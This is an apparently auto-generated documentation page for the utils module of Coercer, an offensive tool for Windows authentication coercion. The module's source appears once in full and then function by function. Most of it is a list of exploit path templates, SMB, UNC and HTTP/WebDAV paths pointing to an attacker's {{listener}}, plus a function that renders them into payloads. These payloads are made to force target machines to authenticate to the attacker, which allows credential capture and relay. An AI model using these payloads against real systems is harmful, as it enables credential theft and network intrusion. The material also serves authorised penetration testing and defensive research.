coercer.core.utils

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : utils.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 15 Sep 2022
  6
  7
  8import random
  9import jinja2
 10
 11
 12def gen_random_name(length=8):
 13    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
 14    name = ""
 15    for k in range(length):
 16        name += random.choice(alphabet)
 17    return name
 18
 19
 20def generate_exploit_templates(desired_auth_type=None):
 21    add_uncommon_tests = False
 22
 23    templates = [
 24        # Only ip
 25        ("smb", '{{listener}}\x00'),
 26        # SMB
 27        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 28        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 29        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 30        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'),
 31        ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'),
 32        # SMB path with ?
 33        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 34        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 35        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 36        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'),
 37        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'),
 38        # SMB path with .
 39        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 40        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 41        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 42        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'),
 43        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'),
 44        # UNC path with ?
 45        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 46        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 47        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 48        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
 49        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
 50        # UNC path with ??
 51        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 52        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
 53        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 54        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 55        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
 56        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
 57        # UNC path with .
 58        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 59        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 60        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 61        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
 62        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
 63        # HTTP
 64        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
 65        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
 66        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
 67        ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
 68        ("http", '\\\\{{listener}}{{http_listen_port}}\x00')
 69    ]
 70
 71    if add_uncommon_tests:
 72        templates += [
 73
 74            # HTTP
 75            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'),
 76            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'),
 77            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'),
 78            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'),
 79            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'),
 80            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
 81            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
 82
 83            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'),
 84            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'),
 85            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'),
 86            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'),
 87            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'),
 88            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'),
 89            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'),
 90
 91            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
 92            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
 93            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'),
 94            ("smb", '\\UNC\\{{listener}}\\\x00'),
 95            ("smb", '\\UNC\\{{listener}}\x00'),
 96
 97            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
 98            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
 99            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'),
100            ("smb", 'UNC\\{{listener}}\\\x00'),
101            ("smb", 'UNC\\{{listener}}\x00'),
102
103            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
104            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'),
105            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'),
106            ("smb", 'UNC:\\{{listener}}\\\x00'),
107            ("smb", 'UNC:\\{{listener}}\x00'),
108
109            ("http", 'http://{{listener}}/EndpointName/File.txt\x00'),
110            ("http", 'http://{{listener}}/EndpointName/\x00'),
111            ("http", 'http://{{listener}}/\x00'),
112            ("http", 'http://{{listener}}\x00'),
113
114            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'),
115            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'),
116            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'),
117            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'),
118            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'),
119            ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'),
120            ("http", 'file://\\\\{{listener}}\\EndpointName\x00'),
121        ]
122
123    paths = []
124    for auth_type, exploit_path in templates:
125        if desired_auth_type is not None:
126            if auth_type == desired_auth_type:
127                paths.append((auth_type, exploit_path))
128        else:
129            paths.append((auth_type, exploit_path))
130    return paths
131
132
133def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
134    # Declaring template functions
135    rnd = gen_random_name
136
137    if smb_listen_port is not None and smb_listen_port != 445:
138        smb_listen_port = "@%d" % smb_listen_port
139    else:
140        smb_listen_port = ""
141
142    if http_listen_port is not None:
143        http_listen_port = "@%d" % http_listen_port
144    else:
145        http_listen_port = "@80"
146
147    # Rendering template
148    exploit_path = jinja2.Template(template).render(
149        listener=listener,
150        rnd=rnd,
151        http_listen_port=http_listen_port,
152        smb_listen_port=smb_listen_port
153    )
154    return exploit_path
def gen_random_name(length=8):
13def gen_random_name(length=8):
14    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
15    name = ""
16    for k in range(length):
17        name += random.choice(alphabet)
18    return name
def generate_exploit_templates(desired_auth_type=None):
 21def generate_exploit_templates(desired_auth_type=None):
 22    add_uncommon_tests = False
 23
 24    templates = [
 25        # Only ip
 26        ("smb", '{{listener}}\x00'),
 27        # SMB
 28        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 29        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 30        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 31        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\\x00'),
 32        ("smb", '\\\\{{listener}}{{smb_listen_port}}\x00'),
 33        # SMB path with ?
 34        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 35        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 36        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 37        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\\\x00'),
 38        ("smb", '\\\\?\\{{listener}}{{smb_listen_port}}\x00'),
 39        # SMB path with .
 40        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 41        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 42        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 43        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\\\x00'),
 44        ("smb", '\\\\.\\{{listener}}{{smb_listen_port}}\x00'),
 45        # UNC path with ?
 46        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 47        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 48        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 49        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
 50        ("smb", '\\\\?\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
 51        # UNC path with ??
 52        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 53        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa\x00'),
 54        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 55        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 56        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
 57        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
 58        # UNC path with .
 59        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 60        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 61        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 62        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\\\x00'),
 63        ("smb", '\\\\.\\UNC\\{{listener}}{{smb_listen_port}}\x00'),
 64        # HTTP
 65        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\File.txt\x00'),
 66        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
 67        ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
 68        ("http", '\\\\{{listener}}{{http_listen_port}}\\\x00'),
 69        ("http", '\\\\{{listener}}{{http_listen_port}}\x00')
 70    ]
 71
 72    if add_uncommon_tests:
 73        templates += [
 74
 75            # HTTP
 76            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\File.txt\x00'),
 77            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\\\x00'),
 78            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\Path\x00'),
 79            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\\\x00'),
 80            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\{{rnd(8)}}\x00'),
 81            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\\\x00'),
 82            ("http", '\\\\{{listener}}{{http_listen_port}}\\{{rnd(3)}}\x00'),
 83
 84            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/File.txt\x00'),
 85            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path/\x00'),
 86            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/Path\x00'),
 87            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}/\x00'),
 88            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/{{rnd(8)}}\x00'),
 89            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}/\x00'),
 90            ("http", '//{{listener}}{{http_listen_port}}/{{rnd(3)}}\x00'),
 91
 92            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
 93            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
 94            ("smb", '\\UNC\\{{listener}}\\{{rnd(8)}}\x00'),
 95            ("smb", '\\UNC\\{{listener}}\\\x00'),
 96            ("smb", '\\UNC\\{{listener}}\x00'),
 97
 98            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
 99            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\\\x00'),
100            ("smb", 'UNC\\{{listener}}\\{{rnd(8)}}\x00'),
101            ("smb", 'UNC\\{{listener}}\\\x00'),
102            ("smb", 'UNC\\{{listener}}\x00'),
103
104            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\file.txt\x00'),
105            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\\\x00'),
106            ("smb", 'UNC:\\{{listener}}\\{{rnd(8)}}\x00'),
107            ("smb", 'UNC:\\{{listener}}\\\x00'),
108            ("smb", 'UNC:\\{{listener}}\x00'),
109
110            ("http", 'http://{{listener}}/EndpointName/File.txt\x00'),
111            ("http", 'http://{{listener}}/EndpointName/\x00'),
112            ("http", 'http://{{listener}}/\x00'),
113            ("http", 'http://{{listener}}\x00'),
114
115            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\File.txt\x00'),
116            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\\\x00'),
117            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\Path\x00'),
118            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\\\x00'),
119            ("http", 'file://\\\\{{listener}}\\EndpointName\\Share\x00'),
120            ("http", 'file://\\\\{{listener}}\\EndpointName\\\x00'),
121            ("http", 'file://\\\\{{listener}}\\EndpointName\x00'),
122        ]
123
124    paths = []
125    for auth_type, exploit_path in templates:
126        if desired_auth_type is not None:
127            if auth_type == desired_auth_type:
128                paths.append((auth_type, exploit_path))
129        else:
130            paths.append((auth_type, exploit_path))
131    return paths
def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
134def generate_exploit_path_from_template(template, listener, http_listen_port=80, smb_listen_port=445):
135    # Declaring template functions
136    rnd = gen_random_name
137
138    if smb_listen_port is not None and smb_listen_port != 445:
139        smb_listen_port = "@%d" % smb_listen_port
140    else:
141        smb_listen_port = ""
142
143    if http_listen_port is not None:
144        http_listen_port = "@%d" % http_listen_port
145    else:
146        http_listen_port = "@80"
147
148    # Rendering template
149    exploit_path = jinja2.Template(template).render(
150        listener=listener,
151        rnd=rnd,
152        http_listen_port=http_listen_port,
153        smb_listen_port=smb_listen_port
154    )
155    return exploit_path